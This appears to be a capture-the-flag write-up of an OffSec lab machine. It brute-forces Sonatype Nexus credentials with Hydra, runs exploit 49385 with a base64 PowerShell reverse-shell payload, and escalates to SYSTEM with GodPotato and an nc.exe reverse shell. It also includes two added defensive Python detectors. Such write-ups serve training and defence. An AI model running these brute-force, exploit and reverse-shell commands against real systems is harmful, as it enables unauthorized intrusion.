Billyboss

Network

  • Target IP: 192.168.121.61

Enumeration

| Port  | Service         | Version / Description                              |
|-------|-----------------|----------------------------------------------------|
| 21    | ftp             | FTP                                                |
| 80    | http            | BaGet                                              |
| 135   | msrpc           | MSRPC                                              |
| 445   | microsoft-ds    | SMB                                                |
| 5040  | unknown         |                                                    |
| 8081  | blackice-icecap | Sonatype Nexus Repository Manager (OSS 3.21.0-05)  |
| 49664 | unknown         |                                                    |
| 49665 | unknown         |                                                    |
| 49666 | unknown         |                                                    |
| 49667 | unknown         |                                                    |
| 49668 | unknown         |                                                    |
| 49669 | unknown         |                                                    |
```bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.121.61
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 11:08 CET
Nmap scan report for 192.168.121.61
Host is up (0.067s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
8081/tcp  open  blackice-icecap
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
```

Exploit

The Sonatype Nexus Repository Manager service appears to be vulnerable to exploit 49385, but it can only be used after authenticating.

Sonatype Nexus Repository Manager

The service does not use default credentials, so I proceed with a brute force using Hydra.

The credentials are not found in standard lists such as rockyou.

I proceed to create a custom list:

```bash
cewl http://192.168.121.61:8081/ | grep -v CeWL > custom-wordlist.txt
cewl --lowercase http://192.168.121.61:8081/ | grep -v CeWL  >> custom-wordlist.txt
```

And I try Hydra again:

```bash
# -I : ignore any restore files
# -f : stop when a login is found
# -L : username list
# -P : password list
# ^USER64^ and ^PASS64^ tell hydra to base64-encode the values
# C=/ tells hydra to establish session cookies at this URL
# F=403 tells hydra that HTTP 403 means invalid login
hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.121.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'
```

```bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ hydra -I -f -L custom-wordlist.txt -P custom-wordlist.txt 'http-post-form://192.168.121.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-20 16:07:54
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1600 login tries (l:40/p:40), ~100 tries per task
[DATA] attacking http-post-form://192.168.121.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403
[8081][http-post-form] host: 192.168.121.61   login: nexus   password: nexus
[STATUS] attack finished for 192.168.121.61 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-20 16:08:23
```

Credentials found:

  • nexus:nexus
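As an added defender-side example (not code from the writeup): Python detection logic that runs over constructed access-log lines and flags the shape of the Hydra run above, a burst of 403s on POST /service/rapture/session from one source followed by a 2xx. The line layout is assumed to be combined-log style, close to but not necessarily identical to Nexus's request.log; the threshold, window and sample IPs are this example's own choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
LOGIN_PATH = "/service/rapture/session"  # Nexus 3 login endpoint the Hydra run above targets
# Combined-log-style line (assumed layout; Nexus's request.log is close to this, not identical)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect_login_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Per source IP, count 403s on POST LOGIN_PATH inside a sliding window. One alert per IP
    that reaches `threshold`; a later 2xx from that IP marks the guessed password as working."""
    recent = defaultdict(deque)  # ip -> timestamps of 403s still inside the window
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, status = parsed
        if method != "POST" or path != LOGIN_PATH:
            continue
        if status == 403:
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "failures_in_window": len(q),
                              "first_seen": q[0], "success_after_failures": False}
        elif 200 <= status < 300 and ip in alerts:
            alerts[ip]["success_after_failures"] = True
    return list(alerts.values())

def build_sample_log():
    """Constructed sample: one host fails 40 times in 29 s and then logs in (the shape of the
    Hydra run above), plus a normal user who mistypes once and then succeeds."""
    base = datetime(2024, 12, 20, 16, 7, 54, tzinfo=timezone(timedelta(hours=1)))
    fmt = '{ip} - - [{ts}] "POST {path} HTTP/1.1" {code} - 0 12 "Mozilla/5.0"'
    stamp = lambda s: (base + timedelta(seconds=s)).strftime("%d/%b/%Y:%H:%M:%S %z")
    lines = [fmt.format(ip="192.168.45.172", ts=stamp(i * 29 // 40), path=LOGIN_PATH, code=403)
             for i in range(40)]
    lines.append(fmt.format(ip="192.168.45.172", ts=stamp(29), path=LOGIN_PATH, code=204))
    lines += [fmt.format(ip="10.0.0.7", ts=stamp(31), path=LOGIN_PATH, code=c) for c in (403, 204)]
    return lines
```

The single mistyped password from 10.0.0.7 never reaches the threshold, so only the bursting host is reported, and its alert carries success_after_failures=True, which is the case worth paging on.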

At this point I can use exploit 49385. I modify CMD by adding the payload for a reverse shell (base64-encoded PowerShell):

```python
[...]
URL='http://192.168.121.61:8081'
#CMD='cmd.exe /c calc.exe'
CMD='cmd.exe /c powershell -e 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'
USERNAME='nexus'
PASSWORD='nexus'
[...]
```

and I open a listener on port 4455:

```bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
```

I run the exploit:

```bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ python 49385.py
Logging in
Logged in successfully
Command executed
```

And the shell opens on the listener:

```bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.172] from (UNKNOWN) [192.168.121.61] 50336

PS C:\Users\nathan\Nexus\nexus-3.21.0-05> 
```

At this point I retrieve the local.txt flag:

Local Flag

Privilege Escalation

I check the privileges:

```powershell
PS C:\Users\nathan\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
```

I try to abuse the SeImpersonatePrivilege privilege using GodPotato-NET4.exe.

```powershell
PS C:\Users\nathan\Nexus> .\GodPotato-NET4.exe -cmd "cmd /c C:\Users\nathan\Nexus\nc.exe 192.168.45.172 4444 -e cmd"
```

and I am logged in as SYSTEM (even though the whoami command returns no output)

```bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Billyboss]
└─$ nc -nvlp 4444
listening on [any] 4444 ...

connect to [192.168.45.172] from (UNKNOWN) [192.168.121.61] 49798
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```
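As an added defender-side illustration (not code from the writeup): a small Python triage of `whoami /priv` output that flags the privileges whose mere presence on a compromised token, like SeImpersonatePrivilege here, is an escalation path. The HIGH_RISK table and its notes are this example's own summary; the sample rows are taken from the output above.

```python
import re

# Privileges whose presence on a compromised token is an escalation path on its own.
# This table and its notes are the example's own summary, not taken from the writeup.
HIGH_RISK = {
    "SeImpersonatePrivilege": "token impersonation (what GodPotato abuses above)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation via a new primary token",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeBackupPrivilege": "read any file regardless of ACL (e.g. SAM/SYSTEM hives)",
    "SeRestorePrivilege": "write any file regardless of ACL (service binaries, DLLs)",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
}

# One table row: privilege name, free-text description, then Enabled/Disabled
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")

def parse_whoami_priv(text):
    """Parse the table printed by `whoami /priv` into {name: (description, state)}."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc, state)
    return privs

def assess(privs):
    """Return the high-risk privileges the token holds. 'Disabled' is not protection:
    any process running under the token can enable a privilege the token holds."""
    return {name: {"state": privs[name][1], "why": HIGH_RISK[name]}
            for name in privs if name in HIGH_RISK}

# Rows taken from the whoami /priv output above (header and separator lines kept
# to show that the parser skips them).
SAMPLE = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for name, finding in assess(parse_whoami_priv(SAMPLE)).items():
        print(f"{name}: {finding['state']} -> {finding['why']}")
```

Run against the token of the account a web application runs under (here Nexus under nathan); a hit on any HIGH_RISK entry means a code-execution bug in that application is already a SYSTEM compromise.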

I retrieve the proof.txt flag:

System Flag